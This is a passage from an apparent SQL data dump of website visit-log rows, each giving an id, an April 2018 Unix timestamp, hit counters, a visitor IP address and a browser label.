rome'),(228094,1522674676,1,1,0,0,'54.36.148.207','other'),(228095,1522674700,1,1,0,0,'54.36.149.47','other'),(228096,1522674726,1,1,0,0,'54.36.148.187','other'),(228097,1522674859,1,0,1,0,'66.249.66.201',''),(228098,1522675132,1,1,0,0,'54.36.148.119','other'),(228099,1522675253,1,1,0,0,'54.36.149.61','other'),(228100,1522675311,1,1,0,0,'54.36.148.137','other'),(228101,1522675312,1,1,0,0,'188.239.243.179','chrome'),(228102,1522675316,1,1,0,0,'54.36.148.27','other'),(228103,1522675487,1,1,0,0,'157.55.39.220','other'),(228104,1522675513,1,1,0,0,'54.36.149.43','other'),(228105,1522675599,1,1,0,0,'54.36.148.101','other'),(228106,1522675615,1,1,0,0,'54.36.148.114','other'),(228107,1522675702,1,1,0,0,'46.174.125.28','chrome'),(228108,1522675740,1,1,0,0,'54.36.149.47','other'),(228109,1522675865,1,1,0,0,'54.36.149.18','other'),(228110,1522676058,1,1,0,0,'54.36.148.134','other'),(228111,1522676062,1,1,0,0,'54.36.148.187','other'),(228112,1522676077,1,1,0,0,'54.36.148.79','other'),(228113,1522676252,1,1,0,0,'54.36.148.23','other'),(228114,1522676338,1,1,0,0,'141.8.142.74','other'),(228115,1522676359,1,1,0,0,'54.36.148.111','other'),(228116,1522676422,1,1,0,0,'54.36.148.44','other'),(228117,1522676683,1,1,0,0,'54.36.149.89','other'),(228118,1522676700,1,1,0,0,'46.174.125.28','chrome'),(228119,1522676867,1,1,0,0,'54.36.149.25','other'),(228120,1522677213,1,1,0,0,'54.36.148.192','other'),(228121,1522677464,1,1,0,0,'178.154.171.88','other'),(228122,1522677552,1,1,0,0,'54.36.148.85','other'),(228123,1522677686,1,1,0,0,'66.249.66.156','chrome'),(228124,1522678162,1,1,0,0,'54.36.149.20','other'),(228125,1522678224,1,1,0,0,'54.36.149.28','other'),(228126,1522678443,1,1,0,0,'178.154.171.88','other'),(228127,1522678634,1,1,0,0,'141.8.142.74','other'),(228128,1522678815,1,1,0,0,'54.36.148.31','other'),(228129,1522678944,1,1,0,0,'54.36.148.50','other'),(228130,1522678956,1,1,0,0,'54.36.148.237','other'),(228131,1522679203,1,1,0,0,'54.36.149.34','other'),(228132,1522679212,1,1,0,0,'54.36.148.76','other'),(228133,1522679268,1,1,0,0,'54.36.149.79','other'),(228134,1522679323,3,3,0,0,'216.244.66.237','other'),(228135,1522679427,1,1,0,0,'54.36.149.103','other'),(228136,1522679710,1,1,0,0,'54.36.148.26','other'),(228137,1522679770,1,1,0,0,'54.36.148.226','other'),(228138,1522679782,1,1,0,0,'54.36.148.123','other'),(228139,1522679937,1,1,0,0,'141.8.142.74','other'),(228140,1522680273,1,1,0,0,'54.36.149.7','other'),(228141,1522680281,1,1,0,0,'8.29.198.25','other'),(228142,1522680411,1,1,0,0,'54.36.148.25','other'),(228143,1522680424,1,1,0,0,'54.36.148.150','other'),(228144,1522680579,1,1,0,0,'178.154.171.88','other'),(228145,1522680594,1,1,0,0,'54.36.149.82','other'),(228146,1522680881,1,1,0,0,'54.36.148.66','other'),(228147,1522680885,1,1,0,0,'54.36.148.174','other'),(228148,1522680977,1,1,0,0,'54.36.148.122','other'),(228149,1522681010,1,1,0,0,'54.36.148.177','other'),(228150,1522681096,1,1,0,0,'54.36.148.56','other'),(228151,1522681329,1,1,0,0,'54.36.148.119','other'),(228152,1522681409,1,1,0,0,'54.36.148.245','other'),(228153,1522681418,1,1,0,0,'54.36.148.155','other'),(228154,1522681624,1,1,0,0,'141.8.142.74','other'),(228155,1522681688,1,1,0,0,'54.36.149.78','other'),(228156,1522681922,1,1,0,0,'54.36.148.240','other'),(228157,1522682017,1,1,0,0,'216.244.66.246','other'),(228158,1522682045,2,2,0,0,'54.36.148.241','other'),(228159,1522682111,1,1,0,0,'54.36.148.94','other'),(228160,1522682154,1,1,0,0,'54.36.148.80','other'),(228161,1522682234,1,1,0,0,'216.244.66.237','other'),(228162,1522682324,1,1,0,0,'54.36.148.171','other'),(228163,1522682508,1,1,0,0,'54.36.149.13','other'),(228164,1522682945,1,1,0,0,'54.36.148.134','other'),(228165,1522683182,1,1,0,0,'141.8.142.74','other'),(228166,1522683208,1,1,0,0,'54.36.148.201','other'),(228167,1522683230,1,1,0,0,'54.36.148.167','other'),(228168,1522683521,1,1,0,0,'54.36.148.71','other'),(228169,1522683630,1,1,0,0,'54.36.148.170','other'),(228170,1522683690,1,1,0,0,'54.36.148.119','other'),(228171,1522683692,1,0,1,0,'66.249.66.195',''),(228172,1522683913,1,1,0,0,'216.244.66.194','other'),(228173,1522683981,1,1,0,0,'193.169.134.38','chrome'),(228174,1522684090,1,1,0,0,'54.36.148.137','other'),(228175,1522684151,1,1,0,0,'141.8.142.74','other'),(228176,1522684207,1,1,0,0,'54.36.148.48','other'),(228177,1522684279,1,1,0,0,'54.36.149.73','other'),(228178,1522684475,1,1,0,0,'87.250.224.46','other'),(228179,1522684503,1,1,0,0,'54.36.149.4','other'),(228180,1522684781,1,1,0,0,'188.230.43.254','other'),(228181,1522684801,1,1,0,0,'54.36.148.71','other'),(228182,1522685059,1,1,0,0,'141.8.142.74','other'),(228183,1522685084,1,1,0,0,'54.36.148.223','other'),(228184,1522685127,1,1,0,0,'54.36.149.1','other'),(228185,1522685227,1,1,0,0,'204.12.226.26','other'),(228186,1522685566,2,2,0,0,'216.244.66.237','other'),(228187,1522685600,1,1,0,0,'91.196.178.68','firefox'),(228188,1522685712,1,1,0,0,'54.36.148.39','other'),(228189,1522685912,1,1,0,0,'54.36.148.171','other'),(228190,1522686026,1,1,0,0,'54.36.149.28','other'),(228191,1522686360,1,1,0,0,'54.36.148.233','other'),(228192,1522686391,1,0,1,0,'66.249.66.158',''),(228193,1522686399,1,1,0,0,'54.36.149.85','other'),(228194,1522686418,1,1,0,0,'54.36.148.213','other'),(228195,1522686503,1,1,0,0,'188.230.43.254','other'),(228196,1522686761,1,1,0,0,'54.36.149.94','other'),(228197,1522686944,2,2,0,0,'37.55.224.39','chrome'),(228198,1522686994,1,1,0,0,'54.36.148.42','other'),(228199,1522687009,1,1,0,0,'54.36.148.92','other'),(228200,1522687148,1,1,0,0,'54.36.148.27','other'),(228201,1522687472,2,2,0,0,'91.196.178.18','chrome'),(228202,1522687485,1,1,0,0,'54.36.148.233','other'),(228203,1522687565,1,1,0,0,'54.36.148.131','other'),(228204,1522687727,1,1,0,0,'54.36.148.62','other'),(228205,1522687824,1,1,0,0,'54.36.149.61','other'),(228206,1522687933,1,1,0,0,'54.36.148.125','other'),(228207,1522687985,1,1,0,0,'54.36.148.188','other'),(228208,1522688021,1,1,0,0,'54.36.148.10','other'),(228209,1522688266,1,1,0,0,'87.250.224.46','other'),(228210,1522688301,2,2,0,0,'141.8.142.74','other'),(228211,1522688578,1,1,0,0,'54.36.148.105','other'),(228212,1522688837,14,14,0,0,'23.237.4.26','other'),(228213,1522688902,1,1,0,0,'54.36.148.52','other'),(228214,1522688908,1,1,0,0,'54.36.148.178','other'),(228215,1522688934,1,1,0,0,'54.36.148.145','other'),(228216,1522689412,2,2,0,0,'216.244.66.237','other'),(228217,1522689683,1,1,0,0,'54.36.148.77','other'),(228218,1522689738,1,1,0,0,'54.36.149.88','other'),(228219,1522689954,1,1,0,0,'188.230.43.254','other'),(228220,1522690094,1,1,0,0,'54.36.148.16','other'),(228221,1522690111,1,1,0,0,'54.36.148.95','other'),(228222,1522690357,1,1,0,0,'54.36.148.212','other'),(228223,1522690418,1,1,0,0,'54.36.148.25','other'),(228224,1522690631,1,1,0,0,'178.92.24.40','chrome'),(228225,1522690717,1,1,0,0,'54.36.148.147','other'),(228226,1522690751,1,1,0,0,'157.55.39.104','other'),(228227,1522690908,1,1,0,0,'54.36.148.44','other'),(228228,1522690923,1,1,0,0,'141.8.142.74','other'),(228229,1522690942,1,1,0,0,'54.36.149.32','other'),(228230,1522691135,1,1,0,0,'8.29.198.25','other'),(228231,1522691276,1,1,0,0,'54.36.148.164','other'),(228232,1522691442,1,1,0,0,'54.36.148.79','other'),(228233,1522691468,1,1,0,0,'54.36.148.171','other'),(228234,1522691738,1,1,0,0,'54.36.149.35','other'),(228235,1522691744,1,1,0,0,'178.154.171.88','other'),(228236,1522691800,1,1,0,0,'46.211.4.75','other'),(228237,1522691896,1,1,0,0,'54.36.148.35','other'),(228238,1522692183,1,1,0,0,'157.55.39.104','other'),(228239,1522692229,1,1,0,0,'54.36.149.70','other'),(228240,1522692384,1,1,0,0,'188.230.43.254','other'),(228241,1522692439,1,1,0,0,'54.36.148.33','other'),(228242,1522692461,1,1,0,0,'54.36.148.125','other'),(228243,1522692788,2,2,0,0,'141.8.142.74','other'),(228244,1522692843,1,1,0,0,'54.36.149.79','other'),(228245,1522692884,1,1,0,0,'54.36.148.242','other'),(228246,1522692986,2,2,0,0,'178.154.171.88','other'),(228247,1522693192,1,1,0,0,'54.36.148.163','other'),(228248,1522693406,1,1,0,0,'37.54.115.138','chrome'),(228249,1522693436,1,1,0,0,'54.36.148.157','other'),(228250,1522693528,1,1,0,0,'54.36.148.66','other'),(228251,1522693585,1,1,0,0,'54.36.149.37','other'),(228252,1522693622,1,1,0,0,'54.36.148.189','other'),(228253,1522693861,1,1,0,0,'54.36.148.249','other'),(228254,1522693927,1,1,0,0,'54.36.148.63','other'),(228255,1522694134,1,1,0,0,'141.8.142.167','other'),(228256,1522694596,1,1,0,0,'54.36.149.7','other'),(228257,1522694630,1,1,0,0,'54.36.148.158','other'),(228258,1522694653,1,1,0,0,'213.5.192.35','chrome'),(228259,1522694780,2,2,0,0,'141.8.142.74','other'),(228260,1522694974,1,1,0,0,'54.36.148.109','other'),(228261,1522694990,1,1,0,0,'54.36.149.35','other'),(228262,1522695526,1,1,0,0,'216.244.66.194','other'),(228263,1522695542,1,1,0,0,'178.154.171.88','other'),(228264,1522695605,1,1,0,0,'54.36.148.217','other'),(228265,1522695661,2,2,0,0,'54.36.148.36','other'),(228266,1522695759,2,2,0,0,'141.8.142.74','other'),(228267,1522696083,1,1,0,0,'54.36.148.253','other'),(228268,1522696159,1,1,0,0,'54.36.148.69','other'),(228269,1522696353,1,1,0,0,'37.54.17.230','chrome'),(228270,1522696644,1,1,0,0,'54.36.149.24','other'),(228271,1522696782,2,2,0,0,'37.54.114.62','chrome'),(228272,1522696936,1,1,0,0,'54.36.148.169','other'),(228273,1522697554,1,1,0,0,'54.36.148.29','other'),(228274,1522697759,1,1,0,0,'54.36.148.205','other'),(228275,1522698106,1,1,0,0,'54.36.148.38','other'),(228276,1522698193,1,1,0,0,'54.36.149.41','other'),(228277,1522698443,1,1,0,0,'141.8.142.74','other'),(228278,1522698491,1,1,0,0,'54.36.148.14','other'),(228279,1522698534,1,1,0,0,'54.36.149.93','other'),(228280,1522698915,1,1,0,0,'54.36.148.225','other'),(228281,1522698929,1,1,0,0,'54.36.148.209','other'),(228282,1522698964,1,1,0,0,'54.36.149.77','other'),(228283,1522699583,1,1,0,0,'54.36.149.78','other'),(228284,1522699807,1,1,0,0,'54.36.148.20','other'),(228285,1522699882,2,2,0,0,'54.36.148.87','other'),(228286,1522700199,1,1,0,0,'54.36.149.10','other'),(228287,1522700261,1,1,0,0,'54.36.148.222','other'),(228288,1522700263,1,1,0,0,'54.36.149.67','other'),(228289,1522700380,1,1,0,0,'54.36.149.89','other'),(228290,1522700521,1,1,0,0,'54.36.148.152','other'),(228291,1522700558,1,1,0,0,'54.36.148.71','other'),(228292,1522700607,1,1,0,0,'54.36.148.143','other'),(228293,1522700704,1,0,1,0,'66.249.66.156',''),(228294,1522701146,1,1,0,0,'54.36.148.145','other'),(228295,1522701309,1,1,0,0,'141.8.142.74','other'),(228296,1522701637,1,1,0,0,'80.252.155.198','other'),(228297,1522701918,1,1,0,0,'54.36.148.108','other'),(228298,1522701973,1,1,0,0,'8.29.198.27','other'),(228299,1522702174,1,1,0,0,'157.55.39.195','other'),(228300,1522702240,1,1,0,0,'54.36.148.107','other'),(228301,1522702594,1,1,0,0,'54.36.148.115','other'),(228302,1522702728,1,1,0,0,'54.36.149.86','other'),(228303,1522702780,1,1,0,0,'54.36.149.53','other'),(228304,1522703269,1,1,0,0,'54.36.148.116','other'),(228305,1522703308,1,1,0,0,'54.36.149.103','other'),(228306,1522703630,2,2,0,0,'141.8.142.74','other'),(228307,1522703836,1,1,0,0,'54.36.148.217','other'),(228308,1522704409,2,2,0,0,'216.244.66.237','other'),(228309,1522704668,1,1,0,0,'54.36.148.52','other'),(228310,1522704706,1,1,0,0,'54.36.148.23','other'),(228311,1522704714,1,1,0,0,'54.36.148.190','other'),(228312,1522704922,1,1,0,0,'54.36.149.106','other'),(228313,1522704990,1,1,0,0,'54.36.148.222','other'),(228314,1522705186,1,1,0,0,'54.36.148.226','other'),(228315,1522705637,1,1,0,0,'54.36.148.97','other'),(228316,1522705641,1,1,0,0,'54.36.148.56','other'),(228317,1522705691,1,1,0,0,'54.36.148.87','other'),(228318,1522705701,1,1,0,0,'54.36.148.151','other'),(228319,1522705794,1,1,0,0,'54.36.148.89','other'),(228320,1522705913,1,1,0,0,'216.244.66.194','other'),(228321,1522705996,1,1,0,0,'54.36.148.92','other'),(228322,1522706609,1,1,0,0,'87.250.224.46','other'),(228323,1522706614,2,2,0,0,'141.8.142.74','other'),(228324,1522707121,1,1,0,0,'54.36.148.34','other'),(228325,1522707151,1,1,0,0,'54.36.148.13','other'),(228326,1522707475,1,1,0,0,'91.209.11.236','other'),(228327,1522707525,1,1,0,0,'54.36.149.15','other'),(228328,1522707966,1,1,0,0,'54.36.148.163','other'),(228329,1522708104,1,1,0,0,'54.36.149.31','other'),(228330,1522708121,1,1,0,0,'54.36.149.27','other'),(228331,1522708137,1,1,0,0,'141.8.142.74','other'),(228332,1522708152,1,1,0,0,'54.36.148.196','other'),(228333,1522708209,1,1,0,0,'54.36.148.234','other'),(228334,1522708448,1,1,0,0,'54.36.148.142','other'),(228335,1522708623,1,1,0,0,'54.36.148.217','other'),(228336,1522708956,1,1,0,0,'35.226.23.240','other'),(228337,1522709014,1,1,0,0,'54.36.149.12','other'),(228338,1522709076,1,1,0,0,'54.36.148.113','other'),(228339,1522709105,1,1,0,0,'54.36.148.56','other'),(228340,1522709123,1,1,0,0,'54.36.148.36','other'),(228341,1522709492,1,1,0,0,'54.36.148.81','other'),(228342,1522709631,1,1,0,0,'54.36.149.103','other'),(228343,1522709959,1,1,0,0,'54.36.148.163','other'),(228344,1522709974,1,1,0,0,'54.36.148.162','other'),(228345,1522710011,1,1,0,0,'54.36.148.78','other'),(228346,1522710514,1,1,0,0,'54.36.149.72','other'),(228347,1522710661,2,2,0,0,'216.244.66.237','other'),(228348,1522710877,1,1,0,0,'54.36.148.195','other'),(228349,1522711327,3,3,0,0,'141.8.142.74','other'),(228350,1522711470,1,1,0,0,'157.55.39.220','other'),(228351,1522711620,1,1,0,0,'54.36.148.35','other'),(228352,1522711797,1,1,0,0,'54.36.148.137','other'),(228353,1522711843,1,1,0,0,'54.36.149.20','other'),(228354,1522711917,1,1,0,0,'80.252.154.233','chrome'),(228355,1522711941,1,1,0,0,'54.36.149.18','other'),(228356,1522711962,1,1,0,0,'54.36.148.135','other'),(228357,1522712057,1,1,0,0,'54.36.149.12','other'),(228358,1522712279,1,1,0,0,'54.36.149.86','other'),(228359,1522712809,1,1,0,0,'8.29.198.25','other'),(228360,1522712841,1,1,0,0,'54.36.148.130','other'),(228361,1522712975,1,1,0,0,'54.36.148.80','other'),(228362,1522713130,2,2,0,0,'216.244.66.237','other'),(228363,1522713439,1,1,0,0,'54.36.148.234','other'),(228364,1522713652,1,1,0,0,'54.36.148.243','other'),(228365,1522713678,1,1,0,0,'141.8.142.74','other'),(228366,1522713690,1,1,0,0,'54.36.149.107','other'),(228367,1522714048,1,1,0,0,'54.36.149.20','other'),(228368,1522714153,1,1,0,0,'54.36.148.183','other'),(228369,1522714176,1,1,0,0,'54.36.148.209','other'),(228370,1522714420,1,0,1,0,'66.249.66.201',''),(228371,1522714595,1,1,0,0,'54.36.148.25','other'),(228372,1522714653,1,1,0,0,'54.36.148.105','other'),(228373,1522714787,1,1,0,0,'54.36.148.102','other'),(228374,1522714834,1,1,0,0,'141.8.142.74','other'),(228375,1522715162,1,1,0,0,'54.36.148.228','other'),(228376,1522715489,1,1,0,0,'54.36.148.21','other'),(228377,1522715742,1,1,0,0,'54.36.148.69','other'),(228378,1522716148,2,2,0,0,'178.154.171.88','other'),(228379,1522716843,1,1,0,0,'54.36.148.122','other'),(228380,1522716982,1,1,0,0,'54.36.149.35','other'),(228381,1522716995,1,1,0,0,'54.36.148.111','other'),(228382,1522717103,1,1,0,0,'54.36.149.68','other'),(228383,1522717312,1,1,0,0,'54.36.148.132','other'),(228384,1522717384,1,1,0,0,'54.36.149.0','other'),(228385,1522717887,1,1,0,0,'54.36.148.13','other'),(228386,1522717933,1,1,0,0,'54.36.148.46','other'),(228387,1522718167,1,1,0,0,'54.36.149.40','other'),(228388,1522718311,1,1,0,0,'54.36.149.36','other'),(228389,1522718526,1,1,0,0,'54.36.148.18','other'),(228390,1522718690,1,1,0,0,'54.36.148.98','other'),(228391,1522718729,1,1,0,0,'54.36.148.42','other'),(228392,1522718832,2,2,0,0,'141.8.142.74','other'),(228393,1522718890,1,1,0,0,'54.36.148.122','other'),(228394,1522718901,1,1,0,0,'54.36.148.45','other'),(228395,1522719196,1,1,0,0,'54.36.148.166','other'),(228396,1522720331,1,1,0,0,'54.36.148.32','other'),(228397,1522720801,1,1,0,0,'141.8.142.74','other'),(228398,1522721223,1,1,0,0,'178.154.171.88','other'),(228399,1522721554,1,1,0,0,'54.36.149.25','other'),(228400,1522721812,1,1,0,0,'37.204.31.146','msie'),(228401,1522721898,1,1,0,0,'54.36.149.37','other'),(228402,1522722048,1,1,0,0,'54.36.149.18','other'),(228403,1522722067,1,1,0,0,'54.36.148.219','other'),(228404,1522722150,1,1,0,0,'54.36.148.23','other'),(228405,1522722251,1,1,0,0,'54.36.148.15','other'),(228406,1522722472,1,1,0,0,'54.36.149.70','other'),(228407,1522722508,1,1,0,0,'54.36.148.135','other'),(228408,1522722515,1,1,0,0,'54.36.149.88','other'),(228409,1522722571,1,1,0,0,'54.36.148.249','other'),(228410,1522722633,1,1,0,0,'54.36.148.103','other'),(228411,1522722879,1,1,0,0,'54.36.149.87','other'),(228412,1522722947,1,1,0,0,'54.36.148.160','other'),(228413,1522722964,1,1,0,0,'54.36.148.226','other'),(228414,1522722983,1,1,0,0,'54.36.148.239','other'),(228415,1522723100,1,1,0,0,'54.36.148.134','other'),(228416,1522723107,1,1,0,0,'54.36.148.166','other'),(228417,1522723117,1,1,0,0,'54.36.149.47','other'),(228418,1522723143,1,1,0,0,'54.36.149.11','other'),(228419,1522723220,1,1,0,0,'54.36.148.198','other'),(228420,1522723359,1,1,0,0,'54.36.149.15','other'),(228421,1522723360,1,1,0,0,'66.249.66.201','chrome'),(228422,1522723367,1,1,0,0,'54.36.149.17','other'),(228423,1522723568,2,2,0,0,'95.213.141.126','opera'),(228424,1522723574,1,1,0,0,'54.36.148.150','other'),(228425,1522723643,1,1,0,0,'8.29.198.27','other'),(228426,1522723697,1,1,0,0,'54.36.149.77','other'),(228427,1522723949,1,1,0,0,'54.36.148.79','other'),(228428,1522724200,1,1,0,0,'54.36.149.26','other'),(228429,1522724214,1,1,0,0,'54.36.149.96','other'),(228430,1522724267,1,1,0,0,'54.36.148.166','other'),(228431,1522724359,1,1,0,0,'54.36.148.75','other'),(228432,1522724412,1,1,0,0,'141.8.142.74','other'),(228433,1522725064,1,1,0,0,'54.36.149.87','other'),(228434,1522725175,1,1,0,0,'54.36.148.157','other'),(228435,1522725269,1,1,0,0,'54.36.148.83','other'),(228436,1522725574,1,1,0,0,'66.249.64.30','chrome'),(228437,1522725843,1,1,0,0,'54.36.149.96','other'),(228438,1522726050,1,1,0,0,'54.36.148.15','other'),(228439,1522726058,1,1,0,0,'54.36.148.247','other'),(228440,1522726498,1,1,0,0,'54.36.148.216','other'),(228441,1522726538,1,1,0,0,'54.36.149.13','other'),(228442,1522726649,2,2,0,0,'54.165.59.7','other'),(228443,1522726683,1,1,0,0,'54.36.148.19','other'),(228444,1522726980,1,1,0,0,'54.36.149.103','other'),(228445,1522727212,1,1,0,0,'54.36.148.244','other'),(228446,1522727353,1,1,0,0,'54.36.149.53','other'),(228447,1522727410,1,1,0,0,'54.36.148.225','other'),(228448,1522727483,1,1,0,0,'54.36.149.18','other'),(228449,1522727572,1,1,0,0,'54.36.149.90','other'),(228450,1522727632,1,1,0,0,'54.36.149.91','other'),(228451,1522727743,1,1,0,0,'54.165.59.7','other'),(228452,1522727840,1,1,0,0,'54.36.148.234','other'),(228453,1522727980,1,1,0,0,'54.36.149.38','other'),(228454,1522728090,1,1,0,0,'54.36.148.162','other'),(228455,1522728166,1,1,0,0,'54.36.149.96','other'),(228456,1522728268,1,1,0,0,'54.36.148.254','other'),(228457,1522728553,1,1,0,0,'54.36.148.163','other'),(228458,1522728697,1,1,0,0,'54.165.59.7','other'),(228459,1522729227,1,1,0,0,'54.36.149.71','other'),(228460,1522729494,1,1,0,0,'54.36.148.151','other'),(228461,1522730108,1,1,0,0,'54.36.149.13','other'),(228462,1522730157,1,1,0,0,'54.36.148.68','other'),(228463,1522730279,1,1,0,0,'216.244.66.194','other'),(228464,1522730340,1,1,0,0,'54.36.148.167','other'),(228465,1522730356,1,1,0,0,'54.36.149.100','other'),(228466,1522730433,1,1,0,0,'54.36.148.210','other'),(228467,1522730520,1,1,0,0,'54.36.148.117','other'),(228468,1522730521,1,1,0,0,'54.36.149.80','other'),(228469,1522730589,1,1,0,0,'54.36.149.70','other'),(228470,1522730594,1,1,0,0,'54.36.148.111','other'),(228471,1522730799,1,1,0,0,'54.36.148.211','other'),(228472,1522730900,1,1,0,0,'54.165.59.7','other'),(228473,1522730928,2,2,0,0,'54.36.148.58','other'),(228474,1522731027,1,1,0,0,'54.36.148.239','other'),(228475,1522731039,1,1,0,0,'54.36.148.175','other'),(228476,1522731184,1,1,0,0,'54.36.149.77','other'),(228477,1522731531,1,1,0,0,'54.36.148.65','other'),(228478,1522731658,1,1,0,0,'54.36.148.34','other'),(228479,1522731911,1,1,0,0,'54.36.148.223','other'),(228480,1522731919,1,1,0,0,'54.36.148.161','other'),(228481,1522732086,1,1,0,0,'54.36.148.173','other'),(228482,1522732356,1,1,0,0,'40.77.167.145','other'),(228483,1522732392,1,1,0,0,'54.36.149.91','other'),(228484,1522732569,1,1,0,0,'54.36.149.55','other'),(228485,1522732601,1,1,0,0,'91.196.178.86','chrome'),(228486,1522732743,1,0,1,0,'66.249.64.29',''),(228487,1522732751,1,1,0,0,'54.36.148.112','other'),(228488,1522733000,1,1,0,0,'178.154.171.88','other'),(228489,1522733076,8,8,0,0,'75.134.141.72','other'),(228490,1522733186,1,1,0,0,'141.8.142.74','other'),(228491,1522733420,1,1,0,0,'54.36.148.89','other'),(228492,1522733421,1,1,0,0,'54.36.148.188','other'),(228493,1522733538,1,1,0,0,'66.249.64.30','chrome'),(228494,1522733576,1,1,0,0,'54.36.149.20','other'),(228495,1522733583,1,1,0,0,'54.36.148.250','other'),(228496,1522733637,1,1,0,0,'54.36.148.201','other'),(228497,1522734174,1,1,0,0,'54.36.148.137','other'),(228498,1522734218,1,1,0,0,'54.36.148.215','other'),(228499,1522734293,1,1,0,0,'54.36.149.8','other'),(228500,1522734441,1,1,0,0,'54.36.148.167','other'),(228501,1522734481,1,1,0,0,'8.29.198.26','other'),(228502,1522734498,1,1,0,0,'54.36.148.52','other'),(228503,1522734566,1,1,0,0,'178.154.200.41','other'),(228504,1522734681,1,1,0,0,'216.244.66.246','other'),(228505,1522734745,2,2,0,0,'141.8.142.74','other'),(228506,1522734770,1,1,0,0,'54.36.149.67','other'),(228507,1522735131,1,1,0,0,'54.36.148.94','other'),(228508,1522735655,1,1,0,0,'54.36.148.32','other'),(228509,1522735665,1,1,0,0,'91.196.178.86','chrome'),(228510,1522735789,1,1,0,0,'54.36.149.60','other'),(228511,1522735845,1,1,0,0,'54.36.148.183','other'),(228512,1522735942,1,1,0,0,'54.36.149.1','other'),(228513,1522736133,1,1,0,0,'54.36.149.89','other'),(228514,1522736179,1,1,0,0,'54.36.148.203','other'),(228515,1522736364,2,2,0,0,'141.8.142.74','other'),(228516,1522736397,1,1,0,0,'54.36.148.136','other'),(228517,1522736411,1,1,0,0,'54.36.149.33','other'),(228518,1522736428,1,1,0,0,'54.36.148.73','other'),(228519,1522737219,1,1,0,0,'54.36.149.22','other'),(228520,1522737228,1,1,0,0,'54.36.148.205','other'),(228521,1522737261,2,2,0,0,'46.174.163.134','chrome'),(228522,1522737476,1,1,0,0,'54.36.148.186','other'),(228523,1522737507,2,2,0,0,'216.244.66.237','other'),(228524,1522737530,1,0,1,0,'66.249.64.28',''),(228525,1522737702,1,1,0,0,'54.36.149.78','other'),(228526,1522737756,1,1,0,0,'54.36.148.142','other'),(228527,1522737785,2,2,0,0,'91.196.178.18','chrome'),(228528,1522737822,1,1,0,0,'54.36.149.2','other'),(228529,1522737853,1,1,0,0,'54.36.148.55','other'),(228530,1522737990,1,1,0,0,'54.36.149.107','other'),(228531,1522738054,1,1,0,0,'54.36.149.105','other'),(228532,1522738176,2,2,0,0,'91.196.177.15','chrome'),(228533,1522738218,1,1,0,0,'54.36.149.76','other'),(228534,1522738257,2,2,0,0,'54.36.149.23','other'),(228535,1522738306,3,3,0,0,'91.196.178.56','chrome'),(228536,1522738398,1,1,0,0,'93.74.213.90','chrome'),(228537,1522738595,1,1,0,0,'54.36.149.75','other'),(228538,1522738610,1,1,0,0,'54.36.148.16','other'),(228539,1522739407,2,2,0,0,'130.180.219.197','chrome'),(228540,1522739633,1,1,0,0,'54.36.148.205','other'),(228541,1522739655,1,1,0,0,'54.36.148.146','other'),(228542,1522739853,1,1,0,0,'54.36.148.241','other'),(228543,1522739857,1,1,0,0,'94.153.192.46','firefox'),(228544,1522739995,1,1,0,0,'178.154.171.88','other'),(228545,1522740116,1,1,0,0,'54.36.148.82','other'),(228546,1522740457,1,1,0,0,'54.36.148.251','other'),(228547,1522740523,1,1,0,0,'54.36.149.97','other'),(228548,1522740632,1,1,0,0,'54.36.148.249','other'),(228549,1522740777,1,0,1,0,'66.249.64.28',''),(228550,1522740903,1,1,0,0,'54.36.148.61','other'),(228551,1522741221,1,1,0,0,'54.36.148.65','other'),(228552,1522741313,1,1,0,0,'54.36.148.238','other'),(228553,1522741330,1,1,0,0,'54.36.149.21','other'),(228554,1522741349,1,0,1,0,'66.249.64.29',''),(228555,1522741370,1,1,0,0,'54.36.148.179','other'),(228556,1522741535,1,1,0,0,'54.36.149.53','other'),(228557,1522741713,1,1,0,0,'54.36.148.219','other'),(228558,1522741987,1,1,0,0,'195.211.174.93','chrome'),(228559,1522742112,1,1,0,0,'54.36.148.38','other'),(228560,1522742368,1,1,0,0,'46.201.241.5','chrome'),(228561,1522742611,1,1,0,0,'54.36.148.238','other'),(228562,1522742784,1,1,0,0,'54.36.148.22','other'),(228563,1522742946,1,1,0,0,'82.144.200.154','chrome'),(228564,1522743019,1,1,0,0,'54.36.148.97','other'),(228565,1522743129,2,2,0,0,'54.36.148.111','other'),(228566,1522743368,1,1,0,0,'54.36.148.190','other'),(228567,1522743384,1,1,0,0,'54.36.149.27','other'),(228568,1522744091,1,1,0,0,'54.36.148.56','other'),(228569,1522744387,1,1,0,0,'54.36.149.2','other'),(228570,1522744500,1,1,0,0,'54.36.148.138','other'),(228571,1522744814,1,1,0,0,'54.36.149.55','other'),(228572,1522744881,1,1,0,0,'54.36.148.14','other'),(228573,1522745078,1,1,0,0,'54.36.148.232','other'),(228574,1522745100,1,1,0,0,'54.36.148.239','other'),(228575,1522745134,1,1,0,0,'207.46.13.175','other'),(228576,1522745147,1,1,0,0,'207.46.13.180','other'),(228577,1522745174,1,1,0,0,'54.36.148.145','other'),(228578,1522745328,1,1,0,0,'144.76.185.181','other'),(228579,1522745338,1,1,0,0,'8.29.198.26','other'),(228580,1522745618,1,1,0,0,'54.36.148.78','other'),(228581,1522745636,2,2,0,0,'216.244.66.246','other'),(228582,1522746033,1,1,0,0,'54.36.148.103','other'),(228583,1522746081,1,1,0,0,'54.36.149.104','other'),(228584,1522746083,1,1,0,0,'91.124.182.170','firefox'),(228585,1522746271,1,1,0,0,'54.36.149.14','other'),(228586,1522746330,1,1,0,0,'54.36.148.112','other'),(228587,1522746973,1,1,0,0,'54.36.148.91','other'),(228588,1522746997,2,2,0,0,'130.180.219.197','chrome'),(228589,1522747218,1,1,0,0,'94.153.229.229','other'),(228590,1522747289,1,1,0,0,'95.132.6.133','firefox'),(228591,1522747690,1,1,0,0,'141.8.142.74','other'),(228592,1522748067,1,1,0,0,'46.201.241.5','chrome'),(228593,1522748209,1,1,0,0,'78.111.189.106','chrome'),(228594,1522748222,1,1,0,0,'54.36.149.34','other'),(228595,1522748296,1,1,0,0,'178.62.230.201','chrome'),(228596,1522748386,1,1,0,0,'216.244.66.237','other'),(228597,1522748546,1,1,0,0,'54.36.148.229','other'),(228598,1522748549,1,1,0,0,'54.36.149.103','other'),(228599,1522748984,1,1,0,0,'54.36.149.87','other'),(228600,1522749015,1,1,0,0,'54.36.148.224','other'),(228601,1522749183,1,1,0,0,'54.36.148.89','other'),(228602,1522749253,1,1,0,0,'54.36.148.185','other'),(228603,1522749324,1,1,0,0,'54.36.148.217','other'),(228604,1522749793,1,1,0,0,'54.36.148.33','other'),(228605,1522749822,1,1,0,0,'54.36.148.160','other'),(228606,1522749857,1,1,0,0,'216.244.66.237','other'),(228607,1522750112,2,2,0,0,'91.196.178.165','chrome'),(228608,1522750174,1,1,0,0,'92.112.249.4